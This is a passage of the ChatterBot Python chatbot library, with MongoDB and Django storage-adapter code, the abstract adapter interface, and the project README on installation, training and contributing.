kwargs['id'] = inserted.inserted_id return Statement(**kwargs) def create_many(self, statements): """ Creates multiple statement entries. 
""" create_statements = [] for statement in statements: statement_data = statement.serialize() tag_data = list(set(statement_data.pop('tags', []))) statement_data['tags'] = tag_data if not statement.search_text: statement_data['search_text'] = self.tagger.get_text_index_string(statement.text) if not statement.search_in_response_to and statement.in_response_to: statement_data['search_in_response_to'] = self.tagger.get_text_index_string(statement.in_response_to) create_statements.append(statement_data) self.statements.insert_many(create_statements) def update(self, statement): data = statement.serialize() data.pop('id', None) data.pop('tags', None) data['search_text'] = self.tagger.get_text_index_string(data['text']) if data.get('in_response_to'): data['search_in_response_to'] = self.tagger.get_text_index_string(data['in_response_to']) update_data = { '$set': data } if statement.tags: update_data['$addToSet'] = { 'tags': { '$each': statement.tags } } search_parameters = {} if statement.id is not None: search_parameters['_id'] = statement.id else: search_parameters['text'] = statement.text search_parameters['conversation'] = statement.conversation update_operation = self.statements.update_one( search_parameters, update_data, upsert=True ) if update_operation.acknowledged: statement.id = update_operation.upserted_id return statement def get_random(self): """ Returns a random statement from the database """ from random import randint count = self.count() if count < 1: raise self.EmptyDatabaseException() random_integer = randint(0, count - 1) statements = self.statements.find().limit(1).skip(random_integer) return self.mongo_to_object(list(statements)[0]) def remove(self, statement_text): """ Removes the statement that matches the input text. """ self.statements.delete_one({'text': statement_text}) def drop(self): """ Remove the database. """ self.client.drop_database(self.database.name) File: chatterbot/storage/__init__.py from chatterbot.storage.storage_adapter import StorageAdapter from chatterbot.storage.django_storage import DjangoStorageAdapter from chatterbot.storage.mongodb import MongoDatabaseAdapter from chatterbot.storage.sql_storage import SQLStorageAdapter __all__ = ( 'StorageAdapter', 'DjangoStorageAdapter', 'MongoDatabaseAdapter', 'SQLStorageAdapter', ) File: chatterbot/storage/storage_adapter.py import logging from chatterbot import languages from chatterbot.tagging import PosLemmaTagger class StorageAdapter(object): """ This is an abstract class that represents the interface that all storage adapters should implement. """ def __init__(self, *args, **kwargs): """ Initialize common attributes shared by all storage adapters. :param str tagger_language: The language that the tagger uses to remove stopwords. """ self.logger = kwargs.get('logger', logging.getLogger(__name__)) Tagger = kwargs.get('tagger', PosLemmaTagger) self.tagger = Tagger(language=kwargs.get( 'tagger_language', languages.ENG )) def get_model(self, model_name): """ Return the model class for a given model name. model_name is case insensitive. """ get_model_method = getattr(self, 'get_%s_model' % ( model_name.lower(), )) return get_model_method() def get_object(self, object_name): """ Return the class for a given object name. object_name is case insensitive. 
""" get_model_method = getattr(self, 'get_%s_object' % ( object_name.lower(), )) return get_model_method() def get_statement_object(self): from chatterbot.conversation import Statement StatementModel = self.get_model('statement') Statement.statement_field_names.extend( StatementModel.extra_statement_field_names ) return Statement def count(self): """ Return the number of entries in the database. """ raise self.AdapterMethodNotImplementedError( 'The `count` method is not implemented by this adapter.' ) def remove(self, statement_text): """ Removes the statement that matches the input text. Removes any responses from statements where the response text matches the input text. """ raise self.AdapterMethodNotImplementedError( 'The `remove` method is not implemented by this adapter.' ) def filter(self, **kwargs): """ Returns a list of objects from the database. The kwargs parameter can contain any number of attributes. Only objects which contain all listed attributes and in which all values match for all listed attributes will be returned. :param page_size: The maximum number of records to load into memory at once when returning results. Defaults to 1000 :param order_by: The field name that should be used to determine the order that results are returned in. Defaults to None :param tags: A list of tags. When specified, the results will only include statements that have a tag in the provided list. Defaults to [] (empty list) :param exclude_text: If the ``text`` of a statement is an exact match for the value of this parameter the statement will not be included in the result set. Defaults to None :param exclude_text_words: If the ``text`` of a statement contains a word from this list then the statement will not be included in the result set. Defaults to [] (empty list) :param persona_not_startswith: If the ``persona`` field of a statement starts with the value specified by this parameter, then the statement will not be returned in the result set. Defaults to None :param search_text_contains: If the ``search_text`` field of a statement contains a word that is in the string provided to this parameter, then the statement will be included in the result set. Defaults to None """ raise self.AdapterMethodNotImplementedError( 'The `filter` method is not implemented by this adapter.' ) def create(self, **kwargs): """ Creates a new statement matching the keyword arguments specified. Returns the created statement. """ raise self.AdapterMethodNotImplementedError( 'The `create` method is not implemented by this adapter.' ) def create_many(self, statements): """ Creates multiple statement entries. """ raise self.AdapterMethodNotImplementedError( 'The `create_many` method is not implemented by this adapter.' ) def update(self, statement): """ Modifies an entry in the database. Creates an entry if one does not exist. """ raise self.AdapterMethodNotImplementedError( 'The `update` method is not implemented by this adapter.' ) def get_random(self): """ Returns a random statement from the database. """ raise self.AdapterMethodNotImplementedError( 'The `get_random` method is not implemented by this adapter.' ) def drop(self): """ Drop the database attached to a given adapter. """ raise self.AdapterMethodNotImplementedError( 'The `drop` method is not implemented by this adapter.' ) class EmptyDatabaseException(Exception): def __init__(self, message=None): default = 'The database currently contains no entries. At least one entry is expected. You may need to train your chat bot to populate your database.' 
super().__init__(message or default) class AdapterMethodNotImplementedError(NotImplementedError): """ An exception to be raised when a storage adapter method has not been implemented. Typically this indicates that the method should be implement in a subclass. """ pass File: chatterbot/storage/django_storage.py from chatterbot.storage import StorageAdapter from chatterbot import constants class DjangoStorageAdapter(StorageAdapter): """ Storage adapter that allows ChatterBot to interact with Django storage backends. """ def __init__(self, **kwargs): super().__init__(**kwargs) self.django_app_name = kwargs.get( 'django_app_name', constants.DEFAULT_DJANGO_APP_NAME ) def get_statement_model(self): from django.apps import apps return apps.get_model(self.django_app_name, 'Statement') def get_tag_model(self): from django.apps import apps return apps.get_model(self.django_app_name, 'Tag') def count(self): Statement = self.get_model('statement') return Statement.objects.count() def filter(self, **kwargs): """ Returns a list of statements in the database that match the parameters specified. """ from django.db.models import Q Statement = self.get_model('statement') kwargs.pop('page_size', 1000) order_by = kwargs.pop('order_by', None) tags = kwargs.pop('tags', []) exclude_text = kwargs.pop('exclude_text', None) exclude_text_words = kwargs.pop('exclude_text_words', []) persona_not_startswith = kwargs.pop('persona_not_startswith', None) search_text_contains = kwargs.pop('search_text_contains', None) # Convert a single sting into a list if only one tag is provided if type(tags) == str: tags = [tags] if tags: kwargs['tags__name__in'] = tags statements = Statement.objects.filter(**kwargs) if exclude_text: statements = statements.exclude( text__in=exclude_text ) if exclude_text_words: or_query = [ ~Q(text__icontains=word) for word in exclude_text_words ] statements = statements.filter( *or_query ) if persona_not_startswith: statements = statements.exclude( persona__startswith='bot:' ) if search_text_contains: or_query = Q() for word in search_text_contains.split(' '): or_query |= Q(search_text__contains=word) statements = statements.filter( or_query ) if order_by: statements = statements.order_by(*order_by) for statement in statements.iterator(): yield statement def create(self, **kwargs): """ Creates a new statement matching the keyword arguments specified. Returns the created statement. """ Statement = self.get_model('statement') Tag = self.get_model('tag') tags = kwargs.pop('tags', []) if 'search_text' not in kwargs: kwargs['search_text'] = self.tagger.get_text_index_string(kwargs['text']) if 'search_in_response_to' not in kwargs: if kwargs.get('in_response_to'): kwargs['search_in_response_to'] = self.tagger.get_text_index_string(kwargs['in_response_to']) statement = Statement(**kwargs) statement.save() tags_to_add = [] for _tag in tags: tag, _ = Tag.objects.get_or_create(name=_tag) tags_to_add.append(tag) statement.tags.add(*tags_to_add) return statement def create_many(self, statements): """ Creates multiple statement entries. 
""" Statement = self.get_model('statement') Tag = self.get_model('tag') tag_cache = {} for statement in statements: statement_data = statement.serialize() tag_data = statement_data.pop('tags', []) statement_model_object = Statement(**statement_data) if not statement.search_text: statement_model_object.search_text = self.tagger.get_text_index_string(statement.text) if not statement.search_in_response_to and statement.in_response_to: statement_model_object.search_in_response_to = self.tagger.get_text_index_string(statement.in_response_to) statement_model_object.save() tags_to_add = [] for tag_name in tag_data: if tag_name in tag_cache: tag = tag_cache[tag_name] else: tag, _ = Tag.objects.get_or_create(name=tag_name) tag_cache[tag_name] = tag tags_to_add.append(tag) statement_model_object.tags.add(*tags_to_add) def update(self, statement): """ Update the provided statement. """ Statement = self.get_model('statement') Tag = self.get_model('tag') if hasattr(statement, 'id'): statement.save() else: statement = Statement.objects.create( text=statement.text, search_text=self.tagger.get_text_index_string(statement.text), conversation=statement.conversation, in_response_to=statement.in_response_to, search_in_response_to=self.tagger.get_text_index_string(statement.in_response_to), created_at=statement.created_at ) for _tag in statement.tags.all(): tag, _ = Tag.objects.get_or_create(name=_tag) statement.tags.add(tag) return statement def get_random(self): """ Returns a random statement from the database """ Statement = self.get_model('statement') statement = Statement.objects.order_by('?').first() if statement is None: raise self.EmptyDatabaseException() return statement def remove(self, statement_text): """ Removes the statement that matches the input text. Removes any responses from statements if the response text matches the input text. """ Statement = self.get_model('statement') statements = Statement.objects.filter(text=statement_text) statements.delete() def drop(self): """ Remove all data from the database. """ Statement = self.get_model('statement') Tag = self.get_model('tag') Statement.objects.all().delete() Tag.objects.all().delete()
![ChatterBot: Machine learning in Python](https://i.imgur.com/b3SCmGT.png)

# ChatterBot

ChatterBot is a machine-learning based conversational dialog engine built in
Python that makes it possible to generate responses based on collections of
known conversations. The language-independent design of ChatterBot allows it
to be trained to speak any language.

[![Package Version](https://img.shields.io/pypi/v/chatterbot.svg)](https://pypi.python.org/pypi/chatterbot/)
[![Python 3.6](https://img.shields.io/badge/python-3.6-blue.svg)](https://www.python.org/downloads/release/python-360/)
[![Django 2.0](https://img.shields.io/badge/Django-2.0-blue.svg)](https://docs.djangoproject.com/en/2.1/releases/2.0/)
[![Requirements Status](https://requires.io/github/gunthercox/ChatterBot/requirements.svg?branch=master)](https://requires.io/github/gunthercox/ChatterBot/requirements/?branch=master)
[![Build Status](https://travis-ci.org/gunthercox/ChatterBot.svg?branch=master)](https://travis-ci.org/gunthercox/ChatterBot)
[![Documentation Status](https://readthedocs.org/projects/chatterbot/badge/?version=stable)](http://chatterbot.readthedocs.io/en/stable/?badge=stable)
[![Coverage Status](https://img.shields.io/coveralls/gunthercox/ChatterBot.svg)](https://coveralls.io/r/gunthercox/ChatterBot)
[![Code Climate](https://codeclimate.com/github/gunthercox/ChatterBot/badges/gpa.svg)](https://codeclimate.com/github/gunthercox/ChatterBot)
[![Join the chat at https://gitter.im/chatterbot/Lobby](https://badges.gitter.im/chatterbot/Lobby.svg)](https://gitter.im/chatterbot/Lobby?utm_source=badge&utm_medium=badge&utm_content=badge)

An example of typical input would be something like this:

> **user:** Good morning! How are you doing?
> **bot:** I am doing very well, thank you for asking.
> **user:** You're welcome.
> **bot:** Do you like hats?

## How it works

An untrained instance of ChatterBot starts off with no knowledge of how to communicate. Each time a user enters a statement, the library saves the text that they entered and the text that the statement was in response to. As ChatterBot receives more input, the number of responses it can reply with grows, and the accuracy of each response in relation to the input statement improves. The program selects the closest matching response by searching for the known statement that most closely matches the input; it then returns the most likely response to that statement, based on how frequently each response is issued by the people the bot communicates with.

## Installation

This package can be installed from [PyPI](https://pypi.python.org/pypi/ChatterBot) by running:

```
pip install chatterbot
```

## Basic Usage

```
from chatterbot import ChatBot
from chatterbot.trainers import ChatterBotCorpusTrainer

chatbot = ChatBot('Ron Obvious')

# Create a new trainer for the chatbot
trainer = ChatterBotCorpusTrainer(chatbot)

# Train the chatbot based on the English corpus
trainer.train("chatterbot.corpus.english")

# Get a response to an input statement
chatbot.get_response("Hello, how are you today?")
```

# Training data

ChatterBot comes with a data utility module that can be used to train chat bots.
At the moment there is training data for over a dozen languages in this module.
Contributions of additional training data or training data in other languages
would be greatly appreciated. Take a look at the data files in the
[chatterbot-corpus](https://github.com/gunthercox/chatterbot-corpus) package
if you are interested in contributing.
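
Training is not limited to the bundled corpora. As a minimal sketch (reusing the `chatbot` object from the Basic Usage example above), the `ListTrainer` from `chatterbot.trainers` teaches the bot from an ordered list of conversation turns, where each statement is learned as a response to the one before it:

```
from chatterbot.trainers import ListTrainer

trainer = ListTrainer(chatbot)

# Each entry is stored as a response to the entry that precedes it
trainer.train([
    "Good morning! How are you doing?",
    "I am doing very well, thank you for asking.",
    "You're welcome.",
])
```

The bundled corpus trainer follows the same pattern:
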
```
from chatterbot.trainers import ChatterBotCorpusTrainer

# Create a new trainer for the chatbot
trainer = ChatterBotCorpusTrainer(chatbot)

# Train based on the English corpus
trainer.train("chatterbot.corpus.english")

# Train based on the English greetings corpus
trainer.train("chatterbot.corpus.english.greetings")

# Train based on the English conversations corpus
trainer.train("chatterbot.corpus.english.conversations")
```

**Corpus contributions are welcome! Please make a pull request.**

# [Documentation](https://chatterbot.readthedocs.io/)

View the [documentation](https://chatterbot.readthedocs.io/) for ChatterBot on Read the Docs.

To build the documentation yourself using [Sphinx](http://www.sphinx-doc.org/), run:

```
sphinx-build -b html docs/ build/
```

# Examples

For examples, see the [examples](https://github.com/gunthercox/ChatterBot/tree/master/examples) directory in this project's git repository.

There is also an example [Django project using ChatterBot](https://github.com/gunthercox/ChatterBot/tree/master/examples), as well as an example [Flask project using ChatterBot](https://github.com/chamkank/flask-chatterbot).

# History

See the [release notes](https://github.com/gunthercox/ChatterBot/releases) for changes.

# Development pattern for contributors

1. [Create a fork](https://help.github.com/articles/fork-a-repo/) of the [main ChatterBot repository](https://github.com/gunthercox/ChatterBot) on GitHub.
2. Make your changes in a branch named something different from `master`, e.g. create a new branch `my-pull-request`.
3. [Create a pull request](https://help.github.com/articles/creating-a-pull-request/).
4. Please follow the [Python style guide for PEP-8](https://www.python.org/dev/peps/pep-0008/).
5. Use the project's [built-in automated testing](https://chatterbot.readthedocs.io/en/latest/testing.html) to help make sure that your contribution is free from errors.

# License

ChatterBot is licensed under the [BSD 3-clause license](https://opensource.org/licenses/BSD-3-Clause).